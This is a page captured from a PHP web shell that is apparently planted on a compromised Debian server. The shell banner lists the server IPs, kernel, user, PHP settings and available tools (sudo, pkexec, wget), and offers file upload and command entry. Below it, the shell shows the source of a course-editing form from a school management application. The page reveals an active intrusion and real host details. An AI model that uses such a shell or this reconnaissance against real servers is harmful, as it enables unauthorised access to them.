Uname:Linux EDL-STRETCH 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

403WebShell
403Webshell
Server IP : 188.114.96.2  /  Your IP : 104.23.197.231
Web Server : Apache/2.4.59 (Debian)
System : Linux EDL-STRETCH 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
User : edlftp ( 1002)
PHP Version : 7.4.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/git/sms.edl.codes.solutions/application/views/backend/admin/course/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/git/sms.edl.codes.solutions/application/views/backend/admin/course/edit.php
<div class="tab-pane box" id="edit" style="padding: 5px">
           <div class="box-content text-right">
             <span id="btn-lesson" class="redirect btn btn-info entypo-flow-tree">Lessons</span>
            <?php echo form_open(base_url() . 'index.php?Courses/edit' , array('class' => 'form-horizontal form-groups-bordered validate','target'=>'_top', 'id'=>'edit-form'));?>
                   <div class="padded">
                       <div class="form-group">
                           <label class="col-sm-3 control-label"></label>
                           <div class="col-sm-5">

                             <select name="name_E" id="name_E" class="form-control select22" style="width:100%;" data-validate="required" data-message-required="<?php echo get_phrase('value_required'); ?>">
                               <option value=""><?php echo get_phrase('select_course_name'); ?></option>
                               <?php
                               foreach ($course_list as $row):
                                 ?>
                                 <option value="<?php echo $row['ID']; ?>"><?php echo $row['CourseName']; ?></option>
                               <?php
                               endforeach;
                               ?>
                             </select>
                               <!--<input type="hidden" value="" id="course_id_E">-->
                               <!--<input type="text" class="form-control" name="name_E" data-validate="required" data-message-required="<?php echo get_phrase('value_required');?>"/>-->
                           </div>
                       </div>
                       <div class="form-group">
                           <label class="col-sm-3 control-label"><?php echo get_phrase('name');?></label>
                           <div class="col-sm-5">
                               <input type="text" class="form-control" name="name_e" id="name_e" data-validate="required" data-message-required="<?php echo get_phrase('value_required');?>"/>
                           </div>
                       </div>
                       <div class="form-group">
                           <label class="col-sm-3 control-label"><?php echo get_phrase('Certificat_Name');?></label>
                           <div class="col-sm-5">
                               <input type="text" class="form-control" name="certif_name_E" data-validate="required" data-message-required="<?php echo get_phrase('value_required');?>"/>
                           </div>
                       </div>
                       <div class="form-group">
                         <label class="col-sm-3 control-label"><?php echo get_phrase('course_language'); ?></label>
                         <div class="col-sm-5">
                           <select name="course_language_id_E" class="form-control select22" style="width:100%;" data-validate="required" data-message-required="<?php echo get_phrase('value_required'); ?>">
                             <option value=""><?php echo get_phrase('select_course_language'); ?></option>
                             <?php
                             foreach ($course_language_list as $row):
                               ?>
                               <option value="<?php echo $row['course_language_id']; ?>"><?php echo $row['code']; ?></option>
                               <?php
                             endforeach;
                             ?>
                           </select>
                         </div>
                       </div>
                       <div class="form-group">
                         <label class="col-sm-3 control-label"><?php echo get_phrase('course_level'); ?></label>
                         <div class="col-sm-5">
                           <select name="course_level_id_E"  class="form-control select22" style="width:100%;" data-validate="required" data-message-required="<?php echo get_phrase('value_required'); ?>">
                             <option value=""><?php echo get_phrase('select_course_level'); ?></option>
                             <?php
                             $courseLevels = $this->crud_model->get_courses_level();
                             foreach ($courseLevels as $row):
                               ?>
                               <option value="<?php echo $row['course_level_id']; ?>"><?php echo $row['code']; ?></option>
                               <?php
                             endforeach;
                              ?>
                           </select>
                         </div>
                       </div>
                       <!---->
                       <div class="form-group">
                         <label class="col-sm-3 control-label"><?php echo get_phrase('course_type'); ?></label>
                         <div class="col-sm-5">
                           <select name="course_type_id_E" class="form-control select22" style="width:100%;" data-validate="required" data-message-required="<?php echo get_phrase('value_required'); ?>">
                             <option value=""><?php echo get_phrase('select_course_type'); ?></option>
                             <?php
                             $courseTypes = $this->crud_model->get_courses_type();
                             foreach ($courseTypes as $row):
                               ?>
                               <option value="<?php echo $row['course_type_id']; ?>"><?php echo $row['code']; ?></option>
                               <?php
                             endforeach;
                             ?>
                           </select>
                         </div>
                       </div>
                       <!---->
                       <div class="form-group">
                         <label class="col-sm-3 control-label"><?php echo get_phrase('course_local'); ?></label>
                         <div class="col-sm-5">
                           <select name="course_local_id_E" id="course_local_id_E" class="form-control select22" style="width:100%;" data-validate="required" data-message-required="<?php echo get_phrase('value_required'); ?>">
                             <option value=""><?php echo get_phrase('select_course_local'); ?></option>
                             <?php
                             $courseTypes = $this->crud_model->get_courses_local();
                             foreach ($courseTypes as $row):
                               ?>
                               <option value="<?php echo $row['course_local_id']; ?>"><?php echo $row['code']; ?></option>
                               <?php
                             endforeach;
                             ?>
                           </select>
                         </div>
                       </div>
                       <!---->
                       <div class="form-group">
                         <label class="col-sm-3 control-label"><?php echo get_phrase('society'); ?></label>
                         <div class="col-sm-5">
                           <select name="course_society_id_E" class="form-control select22" style="width:100%;" data-validate="required" data-message-required="<?php echo get_phrase('value_required'); ?>">
                             <option value=""><?php echo get_phrase('select_society'); ?></option>
                             <?php
                             $courseTypes = $this->crud_model->get_courses_society();
                             foreach ($courseTypes as $row):
                               ?>
                               <option value="<?php echo $row['course_society_id']; ?>"><?php echo $row['code']; ?></option>
                               <?php
                             endforeach;
                             ?>
                           </select>
                         </div>
                       </div>
                       <!---->
                       <!---->
                       <div class="form-group" id="course_address_E">
                         <label for="field-2" class="col-sm-3 control-label"><?php echo get_phrase('course_address');?></label>
                          <div class="col-sm-5">
                             <?php $addressPrefix='course_address'; include(APPPATH.'views/address/inner_text.php'); ?>
                          </div>
                        </div>
                       <!---->
                       <hr>

                       <!---->
                       <div class="form-group contract_E">
                        <label for="field-2" class="col-sm-3 control-label"><?php echo get_phrase('contract_hours');?></label><span>(hours)</span>
                         <div class="col-sm-5">
                           <div class="row">
                             <input type="number" id="hour_contract_E" name="hour_contract_E" min="0" step="0.25" max="1000"></input>
                             <div class="col-sm-6">
                             </div>
                           </div>
                         </div>
                       </div>
                       <!---->
                   </div>
                   <hr>
                   <!---->
                   <div class="form-group">
                     <label for="field-2" class="col-sm-3 control-label">Description</label>
                      <div class="col-sm-5">
                        <textarea name="description_E" class="form-control col-sm-12"></textarea>
                      </div>
                    </div>
                    <!---->

                    <div class="form-group">
                      <label for="field-2" class="col-sm-3 control-label">Course Price[HTVA]</label>
                      <div class="col-sm-3">
                        <input type="text" class="form-control" name="client_price" id="in-htva-e" value="">
                      </div>

                      <label for="field-2" class="col-sm-3 control-label">Course Price[TTC]</label>
                      <div class="col-sm-3">
                        <input type="text" class="form-control" name="client_price" id="in-tva-e" value="">
                      </div>

                      <label for="field-2" class="col-sm-3 control-label">Course Price/Hours[HTVA]</label>
                      <div class="col-sm-3">
                        <input type="text" class="form-control" name="client_price_htva" id="in-pph-htva-e" value="">
                      </div>
                      <label for="field-2" class="col-sm-3 control-label">Course Price/Hours[TTC]</label>
                      <div class="col-sm-3">
                        <input type="text" class="form-control" name="client_price_ttc" id="in-pph-tva-e" value="">
                      </div>
                    <div class="form-group">
                      <label for="field-2" class="col-sm-3 control-label">Vat Course</label>
                      <div class="col-sm-5">
                        <input type="radio" name="vat_option_E" value="yes" id="vat-yes-e"> <label for="vat-yes-e">yes</label>
                        <input type="radio"  name="vat_option_E" value="no" id="vat-no-e"> <label for="vat-yes-e">no</label>
                      </div>
                    </div>
                    <!---->
                   <div class="form-group">
                         <div class="col-sm-offset-3 col-sm-6">
                             <span id="btn-edit"  class="btn btn-info"><?php echo get_phrase('edit_course');?></span>
                             <span id="btn-delete"  class="btn btn-danger"><?php echo get_phrase('delete_course');?></span>
                             <span id="btn-archive"  class="btn btn-warning entypo-archive"><?php echo get_phrase('archive_course');?></span>
                         </div>
                       </div>
               </form>
           </div>
</div>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit